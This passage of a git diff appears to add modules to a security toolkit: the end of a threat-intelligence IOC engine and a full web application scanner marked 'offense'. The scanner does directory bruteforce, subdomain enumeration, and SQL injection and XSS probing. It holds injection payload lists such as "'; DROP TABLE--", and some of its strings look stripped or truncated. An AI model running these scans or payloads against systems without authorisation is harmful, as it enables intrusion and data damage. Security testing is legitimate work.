'total': len(self.iocs), + 'active': sum(1 for i in self.iocs if i.active), + 'by_type': by_type, + 'by_severity': by_severity, + 'by_source': by_source + } + + # ── Feed Management ────────────────────────────────────────────────── + + def add_feed(self, name: str, feed_type: str, url: str, + api_key: str = "", interval_hours: int = 24) -> Dict: + """Add a threat intelligence feed.""" + feed = Feed( + name=name, feed_type=feed_type, url=url, + api_key=api_key, interval_hours=interval_hours + ) + self.feeds.append(feed) + self._save_feeds() + return {'ok': True, 'feed': feed.to_dict()} + + def remove_feed(self, feed_id: str) -> Dict: + """Remove feed by ID.""" + before = len(self.feeds) + self.feeds = [ + f for f in self.feeds + if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] != feed_id + ] + if len(self.feeds) < before: + self._save_feeds() + return {'ok': True} + return {'ok': False, 'error': 'Feed not found'} + + def get_feeds(self) -> List[Dict]: + """List all feeds.""" + return [f.to_dict() for f in self.feeds] + + def fetch_feed(self, feed_id: str) -> Dict: + """Fetch IOCs from a feed.""" + if not requests: + return {'ok': False, 'error': 'requests library not available'} + + feed = None + for f in self.feeds: + if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] == feed_id: + feed = f + break + if not feed: + return {'ok': False, 'error': 'Feed not found'} + + try: + headers = {} + if feed.api_key: + headers['Authorization'] = f'Bearer {feed.api_key}' + headers['X-API-Key'] = feed.api_key + + resp = requests.get(feed.url, headers=headers, timeout=30) + resp.raise_for_status() + + imported = 0 + if feed.feed_type == 'csv_url': + result = self.bulk_import(resp.text, source=feed.name) + imported = result['imported'] + elif feed.feed_type == 'json_url': + data = resp.json() + items = data if isinstance(data, list) else data.get('data', data.get('results', [])) + for item in items: + if isinstance(item, str): + self.add_ioc(item, source=feed.name) + imported += 1 + elif isinstance(item, dict): + val = item.get('value', item.get('indicator', item.get('ioc', ''))) + if val: + self.add_ioc( + val, + ioc_type=item.get('type', None), + source=feed.name, + severity=item.get('severity', 'unknown'), + description=item.get('description', ''), + tags=item.get('tags', []) + ) + imported += 1 + elif feed.feed_type == 'stix_file': + data = resp.json() + objects = data.get('objects', []) + for obj in objects: + if obj.get('type') == 'indicator': + pattern = obj.get('pattern', '') + # Extract value from STIX pattern + m = re.search(r"=\s*'([^']+)'", pattern) + if m: + self.add_ioc( + m.group(1), source=feed.name, + description=obj.get('name', ''), + tags=obj.get('labels', []) + ) + imported += 1 + + feed.last_fetch = datetime.now(timezone.utc).isoformat() + feed.ioc_count = imported + self._save_feeds() + + return {'ok': True, 'imported': imported, 'feed': feed.name} + + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Reputation Lookups ─────────────────────────────────────────────── + + def lookup_virustotal(self, value: str, api_key: str) -> Dict: + """Look up IOC on VirusTotal.""" + if not requests: + return {'ok': False, 'error': 'requests library not available'} + + ioc_type = self.detect_ioc_type(value) + headers = {'x-apikey': api_key} + + try: + if ioc_type == 'ip': + url = f'https://www.virustotal.com/api/v3/ip_addresses/{value}' + elif ioc_type == 'domain': + url = f'https://www.virustotal.com/api/v3/domains/{value}' + elif ioc_type in ('hash_md5', 'hash_sha1', 'hash_sha256'): + url = f'https://www.virustotal.com/api/v3/files/{value}' + elif ioc_type == 'url': + url_id = hashlib.sha256(value.encode()).hexdigest() + url = f'https://www.virustotal.com/api/v3/urls/{url_id}' + else: + return {'ok': False, 'error': f'Unsupported type for VT lookup: {ioc_type}'} + + resp = requests.get(url, headers=headers, timeout=15) + if resp.status_code == 200: + data = resp.json().get('data', {}).get('attributes', {}) + stats = data.get('last_analysis_stats', {}) + return { + 'ok': True, + 'value': value, + 'type': ioc_type, + 'malicious': stats.get('malicious', 0), + 'suspicious': stats.get('suspicious', 0), + 'harmless': stats.get('harmless', 0), + 'undetected': stats.get('undetected', 0), + 'reputation': data.get('reputation', 0), + 'source': 'virustotal' + } + elif resp.status_code == 404: + return {'ok': True, 'value': value, 'message': 'Not found in VirusTotal'} + else: + return {'ok': False, 'error': f'VT API error: {resp.status_code}'} + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def lookup_abuseipdb(self, ip: str, api_key: str) -> Dict: + """Look up IP on AbuseIPDB.""" + if not requests: + return {'ok': False, 'error': 'requests library not available'} + + try: + resp = requests.get( + 'https://api.abuseipdb.com/api/v2/check', + params={'ipAddress': ip, 'maxAgeInDays': 90}, + headers={'Key': api_key, 'Accept': 'application/json'}, + timeout=15 + ) + if resp.status_code == 200: + data = resp.json().get('data', {}) + return { + 'ok': True, + 'ip': ip, + 'abuse_score': data.get('abuseConfidenceScore', 0), + 'total_reports': data.get('totalReports', 0), + 'country': data.get('countryCode', ''), + 'isp': data.get('isp', ''), + 'domain': data.get('domain', ''), + 'is_public': data.get('isPublic', False), + 'source': 'abuseipdb' + } + return {'ok': False, 'error': f'AbuseIPDB error: {resp.status_code}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Correlation ────────────────────────────────────────────────────── + + def correlate_network(self, connections: List[Dict]) -> List[Dict]: + """Check network connections against IOC database.""" + ioc_ips = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'ip' and ioc.active} + ioc_domains = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'domain' and ioc.active} + + matches = [] + for conn in connections: + remote_ip = conn.get('remote_addr', conn.get('ip', '')) + remote_host = conn.get('hostname', '') + + if remote_ip in ioc_ips: + ioc = next(i for i in self.iocs if i.value == remote_ip) + matches.append({ + 'connection': conn, + 'ioc': ioc.to_dict(), + 'match_type': 'ip', + 'severity': ioc.severity + }) + if remote_host and remote_host in ioc_domains: + ioc = next(i for i in self.iocs if i.value == remote_host) + matches.append({ + 'connection': conn, + 'ioc': ioc.to_dict(), + 'match_type': 'domain', + 'severity': ioc.severity + }) + + if matches: + self.alerts.extend([{ + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'type': 'network_match', + **m + } for m in matches]) + + return matches + + def correlate_file_hashes(self, hashes: List[str]) -> List[Dict]: + """Check file hashes against IOC database.""" + hash_iocs = { + ioc.value.lower(): ioc + for ioc in self.iocs + if ioc.ioc_type.startswith('hash_') and ioc.active + } + + matches = [] + for h in hashes: + if h.lower() in hash_iocs: + ioc = hash_iocs[h.lower()] + matches.append({ + 'hash': h, + 'ioc': ioc.to_dict(), + 'severity': ioc.severity + }) + + return matches + + # ── Blocklist Generation ───────────────────────────────────────────── + + def generate_blocklist(self, fmt: str = 'plain', ioc_type: str = 'ip', + min_severity: str = 'low') -> str: + """Generate blocklist from IOCs.""" + severity_order = ['info', 'low', 'medium', 'high', 'critical'] + min_idx = severity_order.index(min_severity) if min_severity in severity_order else 0 + + items = [] + for ioc in self.iocs: + if not ioc.active or ioc.ioc_type != ioc_type: + continue + sev_idx = severity_order.index(ioc.severity) if ioc.severity in severity_order else -1 + if sev_idx >= min_idx: + items.append(ioc.value) + + if fmt == 'iptables': + return '\n'.join(f'iptables -A INPUT -s {ip} -j DROP' for ip in items) + elif fmt == 'nginx_deny': + return '\n'.join(f'deny {ip};' for ip in items) + elif fmt == 'hosts': + return '\n'.join(f'0.0.0.0 {d}' for d in items) + elif fmt == 'dns_blocklist': + return '\n'.join(items) + elif fmt == 'snort': + return '\n'.join( + f'alert ip {ip} any -> $HOME_NET any (msg:"AUTARCH IOC match {ip}"; sid:{i+1000000}; rev:1;)' + for i, ip in enumerate(items) + ) + else: # plain + return '\n'.join(items) + + def get_alerts(self, limit: int = 100) -> List[Dict]: + """Get recent correlation alerts.""" + return self.alerts[-limit:] + + def clear_alerts(self): + """Clear all alerts.""" + self.alerts.clear() + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_threat_intel() -> ThreatIntelEngine: + global _instance + if _instance is None: + _instance = ThreatIntelEngine() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Threat Intel module.""" + engine = get_threat_intel() + + while True: + stats = engine.get_stats() + print(f"\n{'='*60}") + print(f" Threat Intelligence ({stats['total']} IOCs, {len(engine.feeds)} feeds)") + print(f"{'='*60}") + print() + print(" 1 — Add IOC") + print(" 2 — Search IOCs") + print(" 3 — Bulk Import") + print(" 4 — Export IOCs") + print(" 5 — Manage Feeds") + print(" 6 — Reputation Lookup") + print(" 7 — Generate Blocklist") + print(" 8 — View Stats") + print(" 9 — View Alerts") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + value = input(" IOC value: ").strip() + if value: + ioc_type = input(f" Type (auto-detected: {engine.detect_ioc_type(value)}): ").strip() + severity = input(" Severity (critical/high/medium/low/info): ").strip() or 'unknown' + desc = input(" Description: ").strip() + result = engine.add_ioc(value, ioc_type=ioc_type or None, + severity=severity, description=desc) + print(f" {result['action']}: {result['ioc']['value']} ({result['ioc']['ioc_type']})") + elif choice == '2': + search = input(" Search term: ").strip() + results = engine.get_iocs(search=search) + print(f" Found {len(results)} IOCs:") + for ioc in results[:20]: + print(f" [{ioc['severity']:<8}] {ioc['ioc_type']:<12} {ioc['value']}") + elif choice == '3': + print(" Paste IOCs (one per line, Ctrl+D/blank line to finish):") + lines = [] + while True: + try: + line = input() + if not line: + break + lines.append(line) + except EOFError: + break + if lines: + result = engine.bulk_import('\n'.join(lines)) + print(f" Imported: {result['imported']}, Skipped: {result['skipped']}") + elif choice == '4': + fmt = input(" Format (json/csv/stix): ").strip() or 'json' + output = engine.export_iocs(fmt=fmt) + outfile = os.path.join(engine.data_dir, f'export.{fmt}') + with open(outfile, 'w') as f: + f.write(output) + print(f" Exported to {outfile}") + elif choice == '5': + print(f" Feeds ({len(engine.feeds)}):") + for f in engine.get_feeds(): + print(f" {f['name']} ({f['feed_type']}) — last: {f['last_fetch'] or 'never'}") + elif choice == '6': + value = input(" Value to look up: ").strip() + api_key = input(" VirusTotal API key: ").strip() + if value and api_key: + result = engine.lookup_virustotal(value, api_key) + if result['ok']: + print(f" Malicious: {result.get('malicious', 'N/A')} | " + f"Suspicious: {result.get('suspicious', 'N/A')}") + else: + print(f" Error: {result.get('error', result.get('message'))}") + elif choice == '7': + fmt = input(" Format (plain/iptables/nginx_deny/hosts/snort): ").strip() or 'plain' + ioc_type = input(" IOC type (ip/domain): ").strip() or 'ip' + output = engine.generate_blocklist(fmt=fmt, ioc_type=ioc_type) + print(f" Generated {len(output.splitlines())} rules") + elif choice == '8': + print(f" Total IOCs: {stats['total']}") + print(f" Active: {stats['active']}") + print(f" By type: {stats['by_type']}") + print(f" By severity: {stats['by_severity']}") + elif choice == '9': + alerts = engine.get_alerts() + print(f" {len(alerts)} alerts:") + for a in alerts[-10:]: + print(f" [{a.get('severity', '?')}] {a.get('match_type')}: " + f"{a.get('ioc', {}).get('value', '?')}") diff --git a/modules/webapp_scanner.py b/modules/webapp_scanner.py new file mode 100644 index 0000000..f21c809 --- /dev/null +++ b/modules/webapp_scanner.py @@ -0,0 +1,724 @@ +"""AUTARCH Web Application Scanner + +Directory bruteforce, subdomain enumeration, vulnerability scanning (SQLi, XSS), +header analysis, technology fingerprinting, SSL/TLS audit, and crawler. +""" + +DESCRIPTION = "Web application vulnerability scanner" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import ssl +import socket +import hashlib +import threading +import subprocess +from pathlib import Path +from urllib.parse import urlparse, urljoin, quote +from dataclasses import dataclass, field +from typing import Dict, List, Optional, Any, Set +from datetime import datetime, timezone + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + import shutil + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + import requests + from requests.exceptions import RequestException + _HAS_REQUESTS = True +except ImportError: + _HAS_REQUESTS = False + + +# ── Tech Fingerprints ───────────────────────────────────────────────────────── + +TECH_SIGNATURES = { + 'WordPress': {'headers': [], 'body': ['wp-content', 'wp-includes', 'wp-json'], 'cookies': ['wordpress_']}, + 'Drupal': {'headers': ['X-Drupal-'], 'body': ['Drupal.settings', 'sites/default'], 'cookies': ['SESS']}, + 'Joomla': {'headers': [], 'body': ['/media/jui/', 'com_content'], 'cookies': []}, + 'Laravel': {'headers': [], 'body': ['laravel_session'], 'cookies': ['laravel_session']}, + 'Django': {'headers': [], 'body': ['csrfmiddlewaretoken', '__admin__'], 'cookies': ['csrftoken', 'sessionid']}, + 'Express': {'headers': ['X-Powered-By: Express'], 'body': [], 'cookies': ['connect.sid']}, + 'ASP.NET': {'headers': ['X-AspNet-Version', 'X-Powered-By: ASP.NET'], 'body': ['__VIEWSTATE', '__EVENTVALIDATION'], 'cookies': ['ASP.NET_SessionId']}, + 'PHP': {'headers': ['X-Powered-By: PHP'], 'body': ['.php'], 'cookies': ['PHPSESSID']}, + 'Nginx': {'headers': ['Server: nginx'], 'body': [], 'cookies': []}, + 'Apache': {'headers': ['Server: Apache'], 'body': [], 'cookies': []}, + 'IIS': {'headers': ['Server: Microsoft-IIS'], 'body': [], 'cookies': []}, + 'Cloudflare': {'headers': ['Server: cloudflare', 'cf-ray'], 'body': [], 'cookies': ['__cfduid']}, + 'React': {'headers': [], 'body': ['react-root', '_reactRootContainer', 'data-reactroot'], 'cookies': []}, + 'Angular': {'headers': [], 'body': ['ng-app', 'ng-controller', 'angular.min.js'], 'cookies': []}, + 'Vue.js': {'headers': [], 'body': ['vue.min.js', 'v-bind:', 'v-if=', '__vue__'], 'cookies': []}, + 'jQuery': {'headers': [], 'body': ['jquery.min.js', 'jquery-'], 'cookies': []}, + 'Bootstrap': {'headers': [], 'body': ['bootstrap.min.css', 'bootstrap.min.js'], 'cookies': []}, +} + +SECURITY_HEADERS = [ + 'Content-Security-Policy', + 'X-Content-Type-Options', + 'X-Frame-Options', + 'X-XSS-Protection', + 'Strict-Transport-Security', + 'Referrer-Policy', + 'Permissions-Policy', + 'Cross-Origin-Opener-Policy', + 'Cross-Origin-Resource-Policy', + 'Cross-Origin-Embedder-Policy', +] + +# Common directories for bruteforce +DIR_WORDLIST_SMALL = [ + 'admin', 'login', 'wp-admin', 'administrator', 'phpmyadmin', 'cpanel', + 'dashboard', 'api', 'backup', 'config', 'db', 'debug', 'dev', 'docs', + 'dump', 'env', 'git', 'hidden', 'include', 'internal', 'log', 'logs', + 'old', 'panel', 'private', 'secret', 'server-status', 'shell', 'sql', + 'staging', 'status', 'temp', 'test', 'tmp', 'upload', 'uploads', + 'wp-content', 'wp-includes', '.env', '.git', '.htaccess', '.htpasswd', + 'robots.txt', 'sitemap.xml', 'crossdomain.xml', 'web.config', + 'composer.json', 'package.json', '.svn', '.DS_Store', + 'cgi-bin', 'server-info', 'info.php', 'phpinfo.php', 'xmlrpc.php', + 'wp-login.php', '.well-known', 'favicon.ico', 'humans.txt', +] + +# SQLi test payloads +SQLI_PAYLOADS = [ + "'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1", + "' OR 1=1--", "\" OR 1=1--", "'; DROP TABLE--", + "1' AND '1'='1", "1 AND 1=1", "1 UNION SELECT NULL--", + "' UNION SELECT NULL,NULL--", "1'; WAITFOR DELAY '0:0:5'--", + "1' AND SLEEP(5)--", +] + +# XSS test payloads +XSS_PAYLOADS = [ + '', + '">', + "'>", + '', + '', + '">', + "javascript:alert(1)", + '', +] + +# SQL error signatures +SQL_ERRORS = [ + 'sql syntax', 'mysql_fetch', 'mysql_num_rows', 'mysql_query', + 'pg_query', 'pg_exec', 'sqlite3', 'SQLSTATE', + 'ORA-', 'Microsoft OLE DB', 'Unclosed quotation mark', + 'ODBC Microsoft Access', 'JET Database', 'Microsoft SQL Server', + 'java.sql.SQLException', 'PostgreSQL query failed', + 'supplied argument is not a valid MySQL', 'unterminated quoted string', +] + + +# ── Scanner Service ─────────────────────────────────────────────────────────── + +class WebAppScanner: + """Web application vulnerability scanner.""" + + def __init__(self): + self._data_dir = os.path.join(get_data_dir(), 'webapp_scanner') + self._results_dir = os.path.join(self._data_dir, 'results') + os.makedirs(self._results_dir, exist_ok=True) + self._active_jobs: Dict[str, dict] = {} + self._session = None + + def _get_session(self): + if not _HAS_REQUESTS: + raise RuntimeError('requests library required') + if not self._session: + self._session = requests.Session() + self._session.headers.update({ + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) ' + 'Chrome/120.0.0.0 Safari/537.36', + }) + self._session.verify = False + return self._session + + # ── Quick Scan ──────────────────────────────────────────────────────── + + def quick_scan(self, url: str) -> dict: + """Run a quick scan — headers, tech fingerprint, basic checks.""" + if not _HAS_REQUESTS: + return {'ok': False, 'error': 'requests library required'} + url = self._normalize_url(url) + results = { + 'url': url, + 'scan_time': datetime.now(timezone.utc).isoformat(), + 'headers': {}, + 'security_headers': {}, + 'technologies': [], + 'server': '', + 'status_code': 0, + 'redirects': [], + 'ssl': {}, + } + + try: + sess = self._get_session() + resp = sess.get(url, timeout=10, allow_redirects=True) + results['status_code'] = resp.status_code + results['headers'] = dict(resp.headers) + results['server'] = resp.headers.get('Server', '') + + # Track redirects + for r in resp.history: + results['redirects'].append({ + 'url': r.url, + 'status': r.status_code, + }) + + # Security headers + results['security_headers'] = self._check_security_headers(resp.headers) + + # Technology fingerprint + results['technologies'] = self._fingerprint_tech(resp) + + # SSL check + parsed = urlparse(url) + if parsed.scheme == 'https': + results['ssl'] = self._check_ssl(parsed.hostname, parsed.port or 443) + + except Exception as e: + results['error'] = str(e) + + return results + + # ── Directory Bruteforce ────────────────────────────────────────────── + + def dir_bruteforce(self, url: str, wordlist: List[str] = None, + extensions: List[str] = None, + threads: int = 10, timeout: float = 5.0) -> dict: + """Directory bruteforce scan.""" + if not _HAS_REQUESTS: + return {'ok': False, 'error': 'requests library required'} + + url = self._normalize_url(url).rstrip('/') + if not wordlist: + wordlist = DIR_WORDLIST_SMALL + if not extensions: + extensions = [''] + + job_id = f'dirbust_{int(time.time())}' + holder = {'done': False, 'found': [], 'tested': 0, + 'total': len(wordlist) * len(extensions)} + self._active_jobs[job_id] = holder + + def do_scan(): + sess = self._get_session() + results_lock = threading.Lock() + + def test_path(path): + for ext in extensions: + full_path = f'{path}{ext}' if ext else path + test_url = f'{url}/{full_path}' + try: + r = sess.get(test_url, timeout=timeout, + allow_redirects=False) + holder['tested'] += 1 + if r.status_code not in (404, 403, 500): + with results_lock: + holder['found'].append({ + 'path': '/' + full_path, + 'status': r.status_code, + 'size': len(r.content), + 'content_type': r.headers.get('Content-Type', ''), + }) + except Exception: + holder['tested'] += 1 + + threads_list = [] + for word in wordlist: + t = threading.Thread(target=test_path, args=(word,), daemon=True) + threads_list.append(t) + t.start() + if len(threads_list) >= threads: + for t in threads_list: + t.join(timeout=timeout + 5) + threads_list.clear() + for t in threads_list: + t.join(timeout=timeout + 5) + holder['done'] = True + + threading.Thread(target=do_scan, daemon=True).start() + return {'ok': True, 'job_id': job_id} + + # ── Subdomain Enumeration ───────────────────────────────────────────── + + def subdomain_enum(self, domain: str, wordlist: List[str] = None, + use_ct: bool = True) -> dict: + """Enumerate subdomains via DNS bruteforce and CT logs.""" + found = [] + + # Certificate Transparency logs + if use_ct and _HAS_REQUESTS: + try: + resp = requests.get( + f'https://crt.sh/?q=%.{domain}&output=json', + timeout=15) + if resp.status_code == 200: + for entry in resp.json(): + name = entry.get('name_value', '') + for sub in name.split('\n'): + sub = sub.strip().lower() + if sub.endswith('.' + domain) and sub not in found: + found.append(sub) + except Exception: + pass + + # DNS bruteforce + if not wordlist: + wordlist = ['www', 'mail', 'ftp', 'admin', 'api', 'dev', + 'staging', 'test', 'blog', 'shop', 'app', 'cdn', + 'ns1', 'ns2', 'mx', 'smtp', 'imap', 'pop', + 'vpn', 'remote', 'portal', 'webmail', 'secure', + 'beta', 'demo', 'docs', 'git', 'jenkins', 'ci', + 'grafana', 'kibana', 'prometheus', 'monitor', + 'status', 'support', 'help', 'forum', 'wiki', + 'internal', 'intranet', 'proxy', 'gateway'] + + for sub in wordlist: + fqdn = f'{sub}.{domain}' + try: + socket.getaddrinfo(fqdn, None) + if fqdn not in found: + found.append(fqdn) + except socket.gaierror: + pass + + return {'ok': True, 'domain': domain, 'subdomains': sorted(set(found)), + 'count': len(set(found))} + + # ── Vulnerability Scanning ──────────────────────────────────────────── + + def vuln_scan(self, url: str, scan_sqli: bool = True, + scan_xss: bool = True) -> dict: + """Scan for SQL injection and XSS vulnerabilities.""" + if not _HAS_REQUESTS: + return {'ok': False, 'error': 'requests library required'} + + url = self._normalize_url(url) + findings = [] + sess = self._get_session() + + # Crawl to find forms and parameters + try: + resp = sess.get(url, timeout=10) + body = resp.text + except Exception as e: + return {'ok': False, 'error': str(e)} + + # Find URLs with parameters + param_urls = self._extract_param_urls(body, url) + + # Test each URL with parameters + for test_url in param_urls[:20]: # Limit to prevent abuse + parsed = urlparse(test_url) + params = dict(p.split('=', 1) for p in parsed.query.split('&') + if '=' in p) if parsed.query else {} + + for param_name, param_val in params.items(): + if scan_sqli: + sqli_findings = self._test_sqli(sess, test_url, param_name, param_val) + findings.extend(sqli_findings) + + if scan_xss: + xss_findings = self._test_xss(sess, test_url, param_name, param_val) + findings.extend(xss_findings) + + return { + 'ok': True, + 'url': url, + 'findings': findings, + 'urls_tested': len(param_urls[:20]), + } + + def _test_sqli(self, sess, url: str, param: str, original_val: str) -> List[dict]: + """Test a parameter for SQL injection.""" + findings = [] + parsed = urlparse(url) + base_params = dict(p.split('=', 1) for p in parsed.query.split('&') + if '=' in p) if parsed.query else {} + + for payload in SQLI_PAYLOADS[:6]: # Limit payloads + test_params = base_params.copy() + test_params[param] = original_val + payload + try: + test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}' + r = sess.get(test_url, params=test_params, timeout=5) + body = r.text.lower() + + for error_sig in SQL_ERRORS: + if error_sig.lower() in body: + findings.append({ + 'type': 'sqli', + 'severity': 'high', + 'url': url, + 'parameter': param, + 'payload': payload, + 'evidence': error_sig, + 'description': f'SQL injection (error-based) in parameter "{param}"', + }) + return findings # One finding per param is enough + except Exception: + continue + + return findings + + def _test_xss(self, sess, url: str, param: str, original_val: str) -> List[dict]: + """Test a parameter for reflected XSS.""" + findings = [] + parsed = urlparse(url) + base_params = dict(p.split('=', 1) for p in parsed.query.split('&') + if '=' in p) if parsed.query else {} + + for payload in XSS_PAYLOADS[:4]: + test_params = base_params.copy() + test_params[param] = payload + try: + test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}' + r = sess.get(test_url, params=test_params, timeout=5) + if payload in r.text: + findings.append({ + 'type': 'xss', + 'severity': 'high', + 'url': url, + 'parameter': param, + 'payload': payload, + 'description': f'Reflected XSS in parameter "{param}"', + }) + return findings + except Exception: + continue + + return findings + + def _extract_param_urls(self, html: str, base_url: str) -> List[str]: + """Extract URLs with parameters from HTML.""" + urls = set() + # href/src/action attributes + for match in re.finditer(r'(?:href|src|action)=["\']([^"\']+\?[^"\']+)["\']', html): + u = match.group(1) + full = urljoin(base_url, u) + if urlparse(full).netloc == urlparse(base_url).netloc: + urls.add(full) + return list(urls) + + # ── Security Headers ────────────────────────────────────────────────── + + def _check_security_headers(self, headers) -> dict: + """Check for presence and values of security headers.""" + results = {} + for h in SECURITY_HEADERS: + value = headers.get(h, '') + results[h] = { + 'present': bool(value), + 'value': value, + 'rating': 'good' if value else 'missing', + } + + # Specific checks + csp = headers.get('Content-Security-Policy', '') + if csp: + if "'unsafe-inline'" in csp or "'unsafe-eval'" in csp: + results['Content-Security-Policy']['rating'] = 'weak' + + hsts = headers.get('Strict-Transport-Security', '') + if hsts: + if 'max-age' in hsts: + try: + age = int(re.search(r'max-age=(\d+)', hsts).group(1)) + if age < 31536000: + results['Strict-Transport-Security']['rating'] = 'weak' + except Exception: + pass + + return results + + # ── Technology Fingerprinting ───────────────────────────────────────── + + def _fingerprint_tech(self, resp) -> List[str]: + """Identify technologies from response.""" + techs = [] + headers_str = '\n'.join(f'{k}: {v}' for k, v in resp.headers.items()) + body = resp.text[:50000] # Only check first 50KB + cookies_str = ' '.join(resp.cookies.keys()) if resp.cookies else '' + + for tech, sigs in TECH_SIGNATURES.items(): + found = False + for h_sig in sigs['headers']: + if h_sig.lower() in headers_str.lower(): + found = True + break + if not found: + for b_sig in sigs['body']: + if b_sig.lower() in body.lower(): + found = True + break + if not found: + for c_sig in sigs['cookies']: + if c_sig.lower() in cookies_str.lower(): + found = True + break + if found: + techs.append(tech) + + return techs + + # ── SSL/TLS Audit ───────────────────────────────────────────────────── + + def _check_ssl(self, hostname: str, port: int = 443) -> dict: + """Check SSL/TLS configuration.""" + result = { + 'valid': False, + 'issuer': '', + 'subject': '', + 'expires': '', + 'protocol': '', + 'cipher': '', + 'issues': [], + } + try: + ctx = ssl.create_default_context() + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s: + s.settimeout(5) + s.connect((hostname, port)) + cert = s.getpeercert(True) + result['protocol'] = s.version() + result['cipher'] = s.cipher()[0] if s.cipher() else '' + + # Try with verification + ctx2 = ssl.create_default_context() + try: + with ctx2.wrap_socket(socket.socket(), server_hostname=hostname) as s2: + s2.settimeout(5) + s2.connect((hostname, port)) + cert = s2.getpeercert() + result['valid'] = True + result['issuer'] = dict(x[0] for x in cert.get('issuer', [])) + result['subject'] = dict(x[0] for x in cert.get('subject', [])) + result['expires'] = cert.get('notAfter', '') + except ssl.SSLCertVerificationError as e: + result['issues'].append(f'Certificate validation failed: {e}') + + # Check for weak protocols + if result['protocol'] in ('TLSv1', 'TLSv1.1', 'SSLv3'): + result['issues'].append(f'Weak protocol: {result["protocol"]}') + + except Exception as e: + result['error'] = str(e) + + return result + + # ── Crawler ─────────────────────────────────────────────────────────── + + def crawl(self, url: str, max_pages: int = 50, depth: int = 3) -> dict: + """Spider a website and build a sitemap.""" + if not _HAS_REQUESTS: + return {'ok': False, 'error': 'requests library required'} + + url = self._normalize_url(url) + base_domain = urlparse(url).netloc + visited: Set[str] = set() + pages = [] + queue = [(url, 0)] + sess = self._get_session() + + while queue and len(visited) < max_pages: + current_url, current_depth = queue.pop(0) + if current_url in visited or current_depth > depth: + continue + visited.add(current_url) + + try: + r = sess.get(current_url, timeout=5, allow_redirects=True) + page = { + 'url': current_url, + 'status': r.status_code, + 'content_type': r.headers.get('Content-Type', ''), + 'size': len(r.content), + 'title': '', + 'forms': 0, + 'links_out': 0, + } + # Extract title + title_match = re.search(r']*>([^<]+)', r.text, re.I) + if title_match: + page['title'] = title_match.group(1).strip() + + # Count forms + page['forms'] = len(re.findall(r' dict: + holder = self._active_jobs.get(job_id) + if not holder: + return {'ok': False, 'error': 'Job not found'} + result = { + 'ok': True, + 'done': holder['done'], + 'tested': holder['tested'], + 'total': holder['total'], + 'found': holder['found'], + } + if holder['done']: + self._active_jobs.pop(job_id, None) + return result + + # ── Helpers ─────────────────────────────────────────────────────────── + + @staticmethod + def _normalize_url(url: str) -> str: + url = url.strip() + if not url.startswith(('http://', 'https://')): + url = 'https://' + url + return url + + +# ── Singleton ───────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_webapp_scanner() -> WebAppScanner: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = WebAppScanner() + return _instance + + +# ── CLI ─────────────────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for Web Application Scanner.""" + svc = get_webapp_scanner() + + while True: + print("\n╔═══════════════════════════════════════╗") + print("║ WEB APPLICATION SCANNER ║") + print("╠═══════════════════════════════════════╣") + print("║ 1 — Quick Scan (headers + tech) ║") + print("║ 2 — Directory Bruteforce ║") + print("║ 3 — Subdomain Enumeration ║") + print("║ 4 — Vulnerability Scan (SQLi/XSS) ║") + print("║ 5 — Crawl / Spider ║") + print("║ 0 — Back ║") + print("╚═══════════════════════════════════════╝") + + choice = input("\n Select: ").strip() + + if choice == '0': + break + elif choice == '1': + url = input(" URL: ").strip() + if not url: + continue + print(" Scanning...") + r = svc.quick_scan(url) + print(f"\n Status: {r.get('status_code')}") + print(f" Server: {r.get('server', 'unknown')}") + if r.get('technologies'): + print(f" Technologies: {', '.join(r['technologies'])}") + if r.get('security_headers'): + print(" Security Headers:") + for h, info in r['security_headers'].items(): + mark = '\033[92m✓\033[0m' if info['present'] else '\033[91m✗\033[0m' + print(f" {mark} {h}") + if r.get('ssl'): + ssl_info = r['ssl'] + print(f" SSL: {'Valid' if ssl_info.get('valid') else 'INVALID'} " + f"({ssl_info.get('protocol', '?')})") + for issue in ssl_info.get('issues', []): + print(f" [!] {issue}") + elif choice == '2': + url = input(" URL: ").strip() + if not url: + continue + print(" Starting directory bruteforce...") + r = svc.dir_bruteforce(url) + if r.get('job_id'): + while True: + time.sleep(2) + s = svc.get_job_status(r['job_id']) + print(f" [{s['tested']}/{s['total']}] Found: {len(s['found'])}", end='\r') + if s['done']: + print() + for item in s['found']: + print(f" [{item['status']}] {item['path']} ({item['size']} bytes)") + break + elif choice == '3': + domain = input(" Domain: ").strip() + if not domain: + continue + print(" Enumerating subdomains...") + r = svc.subdomain_enum(domain) + print(f"\n Found {r['count']} subdomains:") + for sub in r.get('subdomains', []): + print(f" {sub}") + elif choice == '4': + url = input(" URL: ").strip() + if not url: + continue + print(" Scanning for vulnerabilities...") + r = svc.vuln_scan(url) + if r.get('findings'): + print(f"\n Found {len(r['findings'])} potential vulnerabilities:") + for f in r['findings']: + print(f" [{f['severity'].upper()}] {f['type'].upper()}: {f['description']}") + print(f" Parameter: {f.get('parameter', '?')}, Payload: {f.get('payload', '?')}") + else: + print(" No vulnerabilities found in tested parameters.") + elif choice == '5': + url = input(" URL: ").strip() + if not url: + continue + max_pages = int(input(" Max pages (default 50): ").strip() or '50') + print(" Crawling...") + r = svc.crawl(url, max_pages=max_pages) + 